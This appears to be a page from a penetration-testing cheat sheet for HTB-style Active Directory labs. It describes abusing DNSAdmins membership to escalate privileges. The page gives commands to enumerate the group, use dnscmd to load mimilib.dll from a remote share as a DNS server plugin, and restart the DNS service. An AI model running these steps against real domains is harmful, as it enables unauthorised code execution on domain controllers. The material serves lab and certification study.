AuthorDiscordHTB Pro LabsHTB CPTSHTB CDSA

🟒DNS Admins

Enumerate member of the DNS admin group

Get-NetGRoupMember β€œDNSAdmins”

From the privilege of DNSAdmins group member, configue DDL using dnscmd.exe (needs RSAT DNS)

Share the directory the DLL is in for everyone so it's accessible. logs all DNS queries on C:\Windows\System32\kiwidns.log

Dnscmd <dns server> /config /serverlevelplugindll \\<ip>\dll\mimilib.dll

Restart DNS

Sc \\<dns server> stop dns
Sc \\<dns server> start dns
PreviousConstrained DelegationNextEnterprise Admins

Last updated